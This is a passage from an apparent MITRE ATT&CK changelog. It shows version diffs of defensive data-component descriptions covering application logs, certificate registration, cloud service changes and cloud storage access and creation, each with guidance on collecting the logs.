| | | ecting malicious activities or anomalies. Examples: - Web |
| | | Application Logs: These logs include information about reque |
| | | sts, responses, errors, and security events (e.g., unauthori |
| | | zed access attempts). - Email Application Logs: Logs contain |
| | | metadata about emails sent, received, or blocked (e.g., sen |
| | | der/receiver addresses, message IDs). - SaaS Application Log |
| | | s: Activity logs include user logins, configuration changes, |
| | | and access to sensitive resources. - Cloud Application Logs |
| | | : Logs detail control plane activities, including API calls, |
| | | instance modifications, and network changes. - System/Appli |
| | | cation Monitoring Logs: Logs provide insights into applicati |
| | | on performance, errors, and anomalies. This data component |
| | | can be collected through the following measures: Configure |
| | | Application Logging - Enable logging within the application |
| | | or service. - Examples: - Web Servers: Enable access an |
| | | d error logs in NGINX or Apache. - Email Systems: Enable |
| | | audit logging in Microsoft Exchange or Gmail. Centralized |
| | | Log Management - Use log management solutions like Splunk, |
| | | or a cloud-native logging solution. - Configure the applicat |
| | | ion to send logs to a centralized system for analysis. Clou |
| | | d-Specific Collection - Use services like AWS CloudWatch, A |
| | | zure Monitor, or Google Cloud Operations Suite for cloud-bas |
| | | ed applications. - Ensure logging is enabled for all critica |
| | | l resources (e.g., API calls, IAM changes). SIEM Integratio |
| | | n - Integrate application logs with a SIEM platform (e.g., |
| | | Splunk, QRadar) for real-time correlation and analysis. - Us |
| | | e parsers to standardize log formats and extract key fields |
| | | like timestamps, user IDs, and error codes. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:09:35.474Z |
| description | Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications) | Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples:
- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).
- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).
- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.
- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.
- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.
This data component can be collected through the following measures:
Configure Application Logging
- Enable logging within the application or service.
- Examples:
- Web Servers: Enable access and error logs in NGINX or Apache.
- Email Systems: Enable audit logging in Microsoft Exchange or Gmail.
Centralized Log Management
- Use log management solutions like Splunk, or a cloud-native logging solution.
- Configure the application to send logs to a centralized system for analysis.
Cloud-Specific Collection
- Use services like AWS CloudWatch, Azure Monitor, or Google Cloud Operations Suite for cloud-based applications.
- Ensure logging is enabled for all critical resources (e.g., API calls, IAM changes).
SIEM Integration
- Integrate application logs with a SIEM platform (e.g., Splunk, QRadar) for real-time correlation and analysis.
- Use parsers to standardize log formats and extract key fields like timestamps, user IDs, and error codes. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Certificate: Certificate Registration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Queried or logged information highlighting current and expir | t | Certificate Registration refers to the collection and analys |
| ed digital certificates (ex: Certificate transparency) | | is of information about digital certificates, including curr |
| | | ent, revoked, and expired certificates. Sources such as Cert |
| | | ificate Transparency logs and other public resources provide |
| | | visibility into certificates issued for specific domains or |
| | | organizations. Monitoring certificate registrations can hel |
| | | p identify potential misuse, such as unauthorized certificat |
| | | es or signs of adversary reconnaissance. Examples: - Certi |
| | | ficate Transparency Logs: These logs record the issuance of |
| | | SSL/TLS certificates by trusted Certificate Authorities (CAs |
| | | ). - Revoked Certificates: Information about certificates th |
| | | at have been invalidated before their expiration date. - Exp |
| | | ired Certificates: Reports of expired certificates for a dom |
| | | ain, which may indicate lax security practices or opportunit |
| | | ies for adversaries to exploit expired credentials. - Domain |
| | | Monitoring for Certificates: Maps SSL/TLS certificates to d |
| | | omains and subdomains, helping to identify any rogue certifi |
| | | cates. - Public Certificate Directories: Services providing |
| | | APIs to query issued certificates for analysis. This data c |
| | | omponent can be collected through the following measures: U |
| | | se Certificate Transparency Monitors - Tools like crt.sh, C |
| | | ertStream, or APIs provided by certificate authorities (CAs) |
| | | allow you to monitor issued certificates in real-time. - Ex |
| | | ample: Use CertStream to stream certificate issuance logs an |
| | | d filter for domains of interest. Analyze Certificate Revoc |
| | | ation Sources - Monitor CRLs or query OCSP responders to de |
| | | tect revoked certificates. - Configure tools like OpenSSL or |
| | | browsers to validate certificate revocation status automati |
| | | cally. Leverage Public Scanning Tools - Use tools such as |
| | | SSL Labs, Censys, or Shodan to scan for certificate details |
| | | related to your domain or network. Automate Certificate Mon |
| | | itoring - Set up automated scripts or services to parse Cer |
| | | tificate Transparency logs for anomalies. - Example: Automat |
| | | e searches on crt.sh to identify certificates issued for typ |
| | | o-squatted domains. Integrate with Threat Intelligence - E |
| | | nrich certificate data with threat intelligence feeds to det |
| | | ect connections to known adversary-controlled infrastructure |
| | | . - Tools like VirusTotal can identify malicious certificate |
| | | s based on associated indicators. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:14:58.597Z |
| description | Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency) | Certificate Registration refers to the collection and analysis of information about digital certificates, including current, revoked, and expired certificates. Sources such as Certificate Transparency logs and other public resources provide visibility into certificates issued for specific domains or organizations. Monitoring certificate registrations can help identify potential misuse, such as unauthorized certificates or signs of adversary reconnaissance. Examples:
- Certificate Transparency Logs: These logs record the issuance of SSL/TLS certificates by trusted Certificate Authorities (CAs).
- Revoked Certificates: Information about certificates that have been invalidated before their expiration date.
- Expired Certificates: Reports of expired certificates for a domain, which may indicate lax security practices or opportunities for adversaries to exploit expired credentials.
- Domain Monitoring for Certificates: Maps SSL/TLS certificates to domains and subdomains, helping to identify any rogue certificates.
- Public Certificate Directories: Services providing APIs to query issued certificates for analysis.
This data component can be collected through the following measures:
Use Certificate Transparency Monitors
- Tools like crt.sh, CertStream, or APIs provided by certificate authorities (CAs) allow you to monitor issued certificates in real-time.
- Example: Use CertStream to stream certificate issuance logs and filter for domains of interest.
Analyze Certificate Revocation Sources
- Monitor CRLs or query OCSP responders to detect revoked certificates.
- Configure tools like OpenSSL or browsers to validate certificate revocation status automatically.
Leverage Public Scanning Tools
- Use tools such as SSL Labs, Censys, or Shodan to scan for certificate details related to your domain or network.
Automate Certificate Monitoring
- Set up automated scripts or services to parse Certificate Transparency logs for anomalies.
- Example: Automate searches on crt.sh to identify certificates issued for typo-squatted domains.
Integrate with Threat Intelligence
- Enrich certificate data with threat intelligence feeds to detect connections to known adversary-controlled infrastructure.
- Tools like VirusTotal can identify malicious certificates based on associated indicators. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Service: Cloud Service Disable
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Deactivation or stoppage of a cloud service (ex: AWS Cloudtr | t | This data component refers to monitoring actions that deacti |
| ail StopLogging) | | vate or stop a cloud service in a cloud control plane. Examp |
| | | les include disabling essential logging services like AWS Cl |
| | | oudTrail (`StopLogging` API call), Microsoft Azure Monitor L |
| | | ogs, or Google Cloud's Operations Suite (formerly Stackdrive |
| | | r). Disabling such services can hinder visibility into adver |
| | | sary activities within the cloud environment. Examples: - |
| | | AWS CloudTrail StopLogging: This action stops logging of API |
| | | activity for a particular trail, effectively reducing the m |
| | | onitoring and visibility of AWS resources and activities. - |
| | | Microsoft Azure Monitor Logs: Disabling these logs hinders t |
| | | he organization’s ability to detect anomalous activities and |
| | | trace malicious actions. - Google Cloud Logging: Disabling |
| | | cloud logging removes visibility into resource activity, pre |
| | | venting monitoring of service access or configuration change |
| | | s. - SaaS Applications: Stopping logging removes visibility |
| | | into user activities, such as email access or file downloads |
| | | , enabling undetected malicious behavior. This data compone |
| | | nt can be collected through the following measures: Enable |
| | | and Monitor Cloud Service Logging - Ensure logging is enabl |
| | | ed for all cloud services, including administrative actions |
| | | like StopLogging. - Example: Use AWS Config to verify that C |
| | | loudTrail is enabled and enforce logging as a compliance rul |
| | | e. API Monitoring - Use API monitoring tools to detect cal |
| | | ls like StopLogging or equivalent service-stopping actions i |
| | | n other platforms. - Example: Monitor AWS CloudWatch for spe |
| | | cific API events such as StopLogging and flag unauthorized u |
| | | sers. SIEM Integration - Collect logs and events from the |
| | | cloud control plane into a centralized SIEM for real-time an |
| | | alysis and correlation. - Example: Ingest AWS CloudTrail log |
| | | s into Splunk or Azure Monitor logs into Sentinel. Cloud Se |
| | | curity Posture Management (CSPM) Tools - Leverage CSPM tool |
| | | s like Prisma Cloud, Dome9, or AWS Security Hub to detect mi |
| | | sconfigurations or suspicious activity, such as disabled log |
| | | ging. - Example: Set alerts for changes to logging configura |
| | | tions in CSPM dashboards. Configure Alerts in Cloud Platfor |
| | | ms - Create native alerts in cloud platforms to detect serv |
| | | ice stoppages. - Example: Configure an AWS CloudWatch alarm |
| | | to trigger when StopLogging is invoked. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:30.989Z |
| description | Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging) | This data component refers to monitoring actions that deactivate or stop a cloud service in a cloud control plane. Examples include disabling essential logging services like AWS CloudTrail (`StopLogging` API call), Microsoft Azure Monitor Logs, or Google Cloud's Operations Suite (formerly Stackdriver). Disabling such services can hinder visibility into adversary activities within the cloud environment. Examples:
- AWS CloudTrail StopLogging: This action stops logging of API activity for a particular trail, effectively reducing the monitoring and visibility of AWS resources and activities.
- Microsoft Azure Monitor Logs: Disabling these logs hinders the organization’s ability to detect anomalous activities and trace malicious actions.
- Google Cloud Logging: Disabling cloud logging removes visibility into resource activity, preventing monitoring of service access or configuration changes.
- SaaS Applications: Stopping logging removes visibility into user activities, such as email access or file downloads, enabling undetected malicious behavior.
This data component can be collected through the following measures:
Enable and Monitor Cloud Service Logging
- Ensure logging is enabled for all cloud services, including administrative actions like StopLogging.
- Example: Use AWS Config to verify that CloudTrail is enabled and enforce logging as a compliance rule.
API Monitoring
- Use API monitoring tools to detect calls like StopLogging or equivalent service-stopping actions in other platforms.
- Example: Monitor AWS CloudWatch for specific API events such as StopLogging and flag unauthorized users.
SIEM Integration
- Collect logs and events from the cloud control plane into a centralized SIEM for real-time analysis and correlation.
- Example: Ingest AWS CloudTrail logs into Splunk or Azure Monitor logs into Sentinel.
Cloud Security Posture Management (CSPM) Tools
- Leverage CSPM tools like Prisma Cloud, Dome9, or AWS Security Hub to detect misconfigurations or suspicious activity, such as disabled logging.
- Example: Set alerts for changes to logging configurations in CSPM dashboards.
Configure Alerts in Cloud Platforms
- Create native alerts in cloud platforms to detect service stoppages.
- Example: Configure an AWS CloudWatch alarm to trigger when StopLogging is invoked. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Service: Cloud Service Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of cloud services (ex: AWS ECS ListService | t | Cloud service enumeration involves listing or querying avail |
| s) | | able cloud services in a cloud control plane. This activity |
| | | is often performed to identify resources such as virtual mac |
| | | hines, storage buckets, compute clusters, or other services |
| | | within a cloud environment. Examples include API calls like |
| | | `AWS ECS ListServices`, `Azure ListAllResources`, or `Google |
| | | Cloud ListInstances`. Examples: AWS Cloud Service Enumera |
| | | tion: The adversary gathers details about existing ECS servi |
| | | ces to identify opportunities for privilege escalation or ex |
| | | filtration. - Azure Resource Enumeration: The adversary coll |
| | | ects information about virtual machines, resource groups, an |
| | | d other Azure assets for reconnaissance purposes. - Google C |
| | | loud Resource Enumeration: The attacker seeks to map the env |
| | | ironment and find misconfigured or underutilized resources f |
| | | or exploitation. - Office 365 Service Enumeration: The attac |
| | | ker may look for data repositories or collaboration tools to |
| | | exfiltrate sensitive information. This data component can |
| | | be collected through the following measures: Enable Cloud |
| | | Activity Logging - Ensure cloud service logs are enabled fo |
| | | r API calls and resource usage. - Example: Enable AWS CloudT |
| | | rail, Azure Monitor, or Google Cloud Logging to track resour |
| | | ce queries. Centralize Logs in a SIEM - Aggregate logs fro |
| | | m cloud control planes into a centralized SIEM (e.g., Splunk |
| | | , Azure Sentinel). - Example: Collect AWS CloudTrail logs an |
| | | d set up alerts for API calls related to service enumeration |
| | | . Use Native Cloud Security Tools - Leverage cloud-native |
| | | security solutions like AWS GuardDuty, Azure Defender, or Go |
| | | ogle Security Command Center. - Example: Use GuardDuty to de |
| | | tect anomalous API activity, such as ListServices being exec |
| | | uted by an unknown user. Implement Network Flow Logging - |
| | | Monitor and analyze VPC flow logs to identify lateral moveme |
| | | nt or enumeration activity. - Example: Inspect flow logs for |
| | | unexpected traffic between compute instances and the cloud |
| | | control plane. API Access Monitoring - Monitor API keys an |
| | | d tokens used for enumeration to identify misuse or compromi |
| | | se. - Example: Use AWS Secrets Manager or Azure Key Vault to |
| | | manage and rotate keys securely. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:34.195Z |
| description | An extracted list of cloud services (ex: AWS ECS ListServices) | Cloud service enumeration involves listing or querying available cloud services in a cloud control plane. This activity is often performed to identify resources such as virtual machines, storage buckets, compute clusters, or other services within a cloud environment. Examples include API calls like `AWS ECS ListServices`, `Azure ListAllResources`, or `Google Cloud ListInstances`. Examples:
AWS Cloud Service Enumeration: The adversary gathers details about existing ECS services to identify opportunities for privilege escalation or exfiltration.
- Azure Resource Enumeration: The adversary collects information about virtual machines, resource groups, and other Azure assets for reconnaissance purposes.
- Google Cloud Resource Enumeration: The attacker seeks to map the environment and find misconfigured or underutilized resources for exploitation.
- Office 365 Service Enumeration: The attacker may look for data repositories or collaboration tools to exfiltrate sensitive information.
This data component can be collected through the following measures:
Enable Cloud Activity Logging
- Ensure cloud service logs are enabled for API calls and resource usage.
- Example: Enable AWS CloudTrail, Azure Monitor, or Google Cloud Logging to track resource queries.
Centralize Logs in a SIEM
- Aggregate logs from cloud control planes into a centralized SIEM (e.g., Splunk, Azure Sentinel).
- Example: Collect AWS CloudTrail logs and set up alerts for API calls related to service enumeration.
Use Native Cloud Security Tools
- Leverage cloud-native security solutions like AWS GuardDuty, Azure Defender, or Google Security Command Center.
- Example: Use GuardDuty to detect anomalous API activity, such as ListServices being executed by an unknown user.
Implement Network Flow Logging
- Monitor and analyze VPC flow logs to identify lateral movement or enumeration activity.
- Example: Inspect flow logs for unexpected traffic between compute instances and the cloud control plane.
API Access Monitoring
- Monitor API keys and tokens used for enumeration to identify misuse or compromise.
- Example: Use AWS Secrets Manager or Azure Key Vault to manage and rotate keys securely. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Service: Cloud Service Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Contextual data about a cloud service and activity around it | t | Cloud service metadata refers to the contextual and descript |
| such as name, type, or purpose/function | | ive information about cloud services, including their name, |
| | | type, purpose, configuration, and activity around them. This |
| | | metadata is essential for understanding the roles and funct |
| | | ions of cloud services, their operational status, and their |
| | | potential misuse. Examples: - Azure Service Metadata: Meta |
| | | data describing a resource in Azure, such as an Azure Storag |
| | | e Account or a Virtual Machine. - AWS Cloud Service Metadata |
| | | : Metadata for an AWS EC2 instance collected using the `Desc |
| | | ribeInstances` API call. - Google Cloud Service Metadata: Me |
| | | tadata for a Google Compute Engine instance collected using |
| | | `gcloud compute instances describe`. - Office 365 Metadata: |
| | | Metadata about an Office 365 SharePoint site. This data com |
| | | ponent can be collected through the following measures: Ena |
| | | ble Cloud Metadata APIs - Leverage APIs provided by cloud p |
| | | roviders to query metadata about services. - AWS: Use AW |
| | | S CLI or SDKs for `DescribeInstances`, `DescribeBuckets`, et |
| | | c. - Azure: Use `az resource list` or SDKs. - Google |
| | | Cloud: Use `gcloud compute instances describe` or related c |
| | | ommands. - Office 365: Use Microsoft Graph API. Central |
| | | ize Metadata in a Security Platform - Aggregate metadata fr |
| | | om multiple clouds into a SIEM or CSPM (Cloud Security Postu |
| | | re Management) tool. - Example: Integrate AWS CloudTrail wit |
| | | h Splunk or Azure Monitor with Sentinel. Enable Continuous |
| | | Monitoring - Set up automated jobs or workflows to regularl |
| | | y query and update metadata. - Example: Use AWS Config to tr |
| | | ack resource configurations and changes over time. Configur |
| | | e Access and Logging - Enable logging for API queries to en |
| | | sure access and usage of metadata are monitored. - Example: |
| | | Use AWS CloudTrail to log API activity for metadata queries. |
| | | Use Cloud Security Tools - Employ CSPM tools like Prisma |
| | | Cloud, Wiz, or Dome9 to gather metadata and identify misconf |
| | | igurations. - Example: Prisma Cloud provides consolidated vi |
| | | ews of metadata for resources across AWS, Azure, and GCP. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:27.794Z |
| description | Contextual data about a cloud service and activity around it such as name, type, or purpose/function | Cloud service metadata refers to the contextual and descriptive information about cloud services, including their name, type, purpose, configuration, and activity around them. This metadata is essential for understanding the roles and functions of cloud services, their operational status, and their potential misuse. Examples:
- Azure Service Metadata: Metadata describing a resource in Azure, such as an Azure Storage Account or a Virtual Machine.
- AWS Cloud Service Metadata: Metadata for an AWS EC2 instance collected using the `DescribeInstances` API call.
- Google Cloud Service Metadata: Metadata for a Google Compute Engine instance collected using `gcloud compute instances describe`.
- Office 365 Metadata: Metadata about an Office 365 SharePoint site.
This data component can be collected through the following measures:
Enable Cloud Metadata APIs
- Leverage APIs provided by cloud providers to query metadata about services.
- AWS: Use AWS CLI or SDKs for `DescribeInstances`, `DescribeBuckets`, etc.
- Azure: Use `az resource list` or SDKs.
- Google Cloud: Use `gcloud compute instances describe` or related commands.
- Office 365: Use Microsoft Graph API.
Centralize Metadata in a Security Platform
- Aggregate metadata from multiple clouds into a SIEM or CSPM (Cloud Security Posture Management) tool.
- Example: Integrate AWS CloudTrail with Splunk or Azure Monitor with Sentinel.
Enable Continuous Monitoring
- Set up automated jobs or workflows to regularly query and update metadata.
- Example: Use AWS Config to track resource configurations and changes over time.
Configure Access and Logging
- Enable logging for API queries to ensure access and usage of metadata are monitored.
- Example: Use AWS CloudTrail to log API activity for metadata queries.
Use Cloud Security Tools
- Employ CSPM tools like Prisma Cloud, Wiz, or Dome9 to gather metadata and identify misconfigurations.
- Example: Prisma Cloud provides consolidated views of metadata for resources across AWS, Azure, and GCP. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Service: Cloud Service Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a cloud service, including its settings and/ | t | Cloud service modification refers to changes made to the con |
| or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule) | | figuration, settings, or data of a cloud service. These modi |
| | | fications can include administrative changes such as enablin |
| | | g or disabling features, altering permissions, or deleting c |
| | | ritical components. Monitoring these changes is critical to |
| | | detect potential misconfigurations or malicious activity. Ex |
| | | amples: - AWS Cloud Service Modifications: A user disables |
| | | AWS CloudTrail logging (StopLogging) or deletes a CloudWatc |
| | | h configuration rule (DeleteConfigRule). - Azure Cloud Servi |
| | | ce Modifications: Changes to Azure Role-Based Access Control |
| | | (RBAC) roles, such as adding a new Contributor role to a se |
| | | nsitive resource. - Google Cloud Service Modifications: Dele |
| | | tion of a Google Cloud Storage bucket or disabling a Google |
| | | Cloud Function. - Office 365 Cloud Service Modifications: Al |
| | | tering mailbox permissions or disabling auditing in Microsof |
| | | t 365. This data component can be collected through the fol |
| | | lowing measures: Enable Cloud Audit Logging - AWS: Enable |
| | | AWS CloudTrail for logging management events such as StopLog |
| | | ging or DeleteTrail. - Azure: Use Azure Activity Logs to mon |
| | | itor resource changes and access actions. - Google Cloud: En |
| | | able Google Cloud Audit Logs to track API calls, resource mo |
| | | difications, and policy changes. - Office 365: Use Unified A |
| | | udit Logs in Microsoft Purview to track administrative actio |
| | | ns. Centralize Log Storage - Consolidate logs from all clo |
| | | ud providers into a SIEM or CSPM (Cloud Security Posture Man |
| | | agement) tool. - Example: Use Splunk or Elastic Stack to ing |
| | | est and analyze logs from AWS, Azure, and Google Cloud. Aut |
| | | omate Alerts for Sensitive Changes - Configure alerts for h |
| | | igh-risk actions, such as disabling logging or modifying IAM |
| | | roles. - AWS Example: Use AWS Config rules to detect and no |
| | | tify changes to critical services. - Azure Example: Set up A |
| | | zure Monitor alerts for write actions on sensitive resources |
| | | . Enable Continuous Monitoring - Use tools like AWS Securi |
| | | ty Hub, Azure Defender, or Google Chronicle to continuously |
| | | monitor cloud service modifications for anomalies. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:24.409Z |
| description | Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule) | Cloud service modification refers to changes made to the configuration, settings, or data of a cloud service. These modifications can include administrative changes such as enabling or disabling features, altering permissions, or deleting critical components. Monitoring these changes is critical to detect potential misconfigurations or malicious activity. Examples:
- AWS Cloud Service Modifications: A user disables AWS CloudTrail logging (StopLogging) or deletes a CloudWatch configuration rule (DeleteConfigRule).
- Azure Cloud Service Modifications: Changes to Azure Role-Based Access Control (RBAC) roles, such as adding a new Contributor role to a sensitive resource.
- Google Cloud Service Modifications: Deletion of a Google Cloud Storage bucket or disabling a Google Cloud Function.
- Office 365 Cloud Service Modifications: Altering mailbox permissions or disabling auditing in Microsoft 365.
This data component can be collected through the following measures:
Enable Cloud Audit Logging
- AWS: Enable AWS CloudTrail for logging management events such as StopLogging or DeleteTrail.
- Azure: Use Azure Activity Logs to monitor resource changes and access actions.
- Google Cloud: Enable Google Cloud Audit Logs to track API calls, resource modifications, and policy changes.
- Office 365: Use Unified Audit Logs in Microsoft Purview to track administrative actions.
Centralize Log Storage
- Consolidate logs from all cloud providers into a SIEM or CSPM (Cloud Security Posture Management) tool.
- Example: Use Splunk or Elastic Stack to ingest and analyze logs from AWS, Azure, and Google Cloud.
Automate Alerts for Sensitive Changes
- Configure alerts for high-risk actions, such as disabling logging or modifying IAM roles.
- AWS Example: Use AWS Config rules to detect and notify changes to critical services.
- Azure Example: Set up Azure Monitor alerts for write actions on sensitive resources.
Enable Continuous Monitoring
- Use tools like AWS Security Hub, Azure Defender, or Google Chronicle to continuously monitor cloud service modifications for anomalies. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening of a cloud storage infrastructure, typically to coll | t | Cloud storage access refers to the retrieval or interaction |
| ect/read its value (ex: AWS S3 GetObject) | | with data stored in cloud infrastructure. This data componen |
| | | t includes activities such as reading, downloading, or acces |
| | | sing files and objects within cloud storage systems. Common |
| | | examples include API calls like GetObject in AWS S3, which r |
| | | etrieves objects from cloud buckets. Examples: - AWS S3 Ac |
| | | cess: An adversary uses the `GetObject` API to retrieve sens |
| | | itive data from an AWS S3 bucket. - Azure Blob Storage Acces |
| | | s: A user accesses a blob in Azure Storage using `Get Blob` |
| | | or `Get Blob Properties`. - Google Cloud Storage Access: An |
| | | adversary uses `storage.objects.get` to download objects fro |
| | | m - OpenStack Swift Storage Access: A user retrieves an obje |
| | | ct from OpenStack Swift using the `GET` method. This data c |
| | | omponent can be collected through the following measures: E |
| | | nable Logging for Cloud Storage Services - AWS S3: Enable S |
| | | erver Access Logging to capture API calls like `GetObject` a |
| | | nd store them in a designated S3 bucket. - Azure Storage: En |
| | | able Azure Storage Logging to capture operations like `GetBl |
| | | ob` and log metadata. - Google Cloud Storage: Enable Data Ac |
| | | cess audit logs for `storage.objects.get` API calls. - OpenS |
| | | tack Swift: Configure middleware for object logging to captu |
| | | re GET requests. Centralize and Aggregate Logs - Use a cen |
| | | tralized logging solution (e.g., Splunk, ELK, or a cloud-nat |
| | | ive SIEM) to ingest and analyze logs from different cloud pr |
| | | oviders. - AWS Example: Use AWS CloudTrail to collect AP |
| | | I activity logs and forward them to your SIEM. - Azure E |
| | | xample: Use Azure Monitor and Log Analytics to analyze stora |
| | | ge access logs. Correlate with IAM Logs - Combine storage |
| | | access logs with IAM activity logs to correlate user actions |
| | | with specific permissions and identities. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:49.144Z |
| description | Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject) | Cloud storage access refers to the retrieval or interaction with data stored in cloud infrastructure. This data component includes activities such as reading, downloading, or accessing files and objects within cloud storage systems. Common examples include API calls like GetObject in AWS S3, which retrieves objects from cloud buckets. Examples:
- AWS S3 Access: An adversary uses the `GetObject` API to retrieve sensitive data from an AWS S3 bucket.
- Azure Blob Storage Access: A user accesses a blob in Azure Storage using `Get Blob` or `Get Blob Properties`.
- Google Cloud Storage Access: An adversary uses `storage.objects.get` to download objects from - OpenStack Swift Storage Access: A user retrieves an object from OpenStack Swift using the `GET` method.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Services
- AWS S3: Enable Server Access Logging to capture API calls like `GetObject` and store them in a designated S3 bucket.
- Azure Storage: Enable Azure Storage Logging to capture operations like `GetBlob` and log metadata.
- Google Cloud Storage: Enable Data Access audit logs for `storage.objects.get` API calls.
- OpenStack Swift: Configure middleware for object logging to capture GET requests.
Centralize and Aggregate Logs
- Use a centralized logging solution (e.g., Splunk, ELK, or a cloud-native SIEM) to ingest and analyze logs from different cloud providers.
- AWS Example: Use AWS CloudTrail to collect API activity logs and forward them to your SIEM.
- Azure Example: Use Azure Monitor and Log Analytics to analyze storage access logs.
Correlate with IAM Logs
- Combine storage access logs with IAM activity logs to correlate user actions with specific permissions and identities. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of new cloud storage infrastructure (ex | t | Cloud Storage Creation refers to the initial creation of a n |
| : AWS S3 CreateBucket) | | ew cloud storage resource, such as buckets, containers, or d |
| | | irectories, within a cloud environment. This action is criti |
| | | cal to track as it might indicate the legitimate provisionin |
| | | g of resources or unauthorized actions taken by adversaries |
| | | to stage, store, or exfiltrate data. Examples: - AWS S3 Bu |
| | | cket Creation: An AWS user creates a new S3 bucket using the |
| | | `CreateBucket` API call. - Azure Blob Storage Container Cre |
| | | ation: A user creates a new container in Azure Blob Storage |
| | | using the `Create Container` operation. - Google Cloud Stora |
| | | ge Bucket Creation: A Google Cloud user creates a new bucket |
| | | using `storage.buckets.create`. - OpenStack Swift Container |
| | | Creation: A user creates a new container in OpenStack Swift |
| | | using the `PUT` method. This data component can be collect |
| | | ed through the following measures: Enable Logging for Cloud |
| | | Storage Services - AWS S3: Enable AWS CloudTrail to log Cr |
| | | eateBucket API actions. - Azure Blob Storage: Enable Azure M |
| | | onitor and Diagnostic Logs for storage account activity. Use |
| | | Azure Event Grid to capture Create Container operations. - |
| | | Google Cloud Storage: Enable Data Access logs in Cloud Audit |
| | | Logs to monitor storage.buckets.create API calls. - OpenSta |
| | | ck Swift: Configure Swift logging to capture PUT requests to |
| | | new containers. Centralized Logging and Analysis - Forwar |
| | | d logs to centralized platforms like Splunk or cloud-native |
| | | SIEM solutions for correlation and analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:14:01.974Z |
| description | Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket) | Cloud Storage Creation refers to the initial creation of a new cloud storage resource, such as buckets, containers, or directories, within a cloud environment. This action is critical to track as it might indicate the legitimate provisioning of resources or unauthorized actions taken by adversaries to stage, store, or exfiltrate data. Examples:
- AWS S3 Bucket Creation: An AWS user creates a new S3 bucket using the `CreateBucket` API call.
- Azure Blob Storage Container Creation: A user creates a new container in Azure Blob Storage using the `Create Container` operation.
- Google Cloud Storage Bucket Creation: A Google Cloud user creates a new bucket using `storage.buckets.create`.
- OpenStack Swift Container Creation: A user creates a new container in OpenStack Swift using the `PUT` method.
This data component can be collected through the following measures:
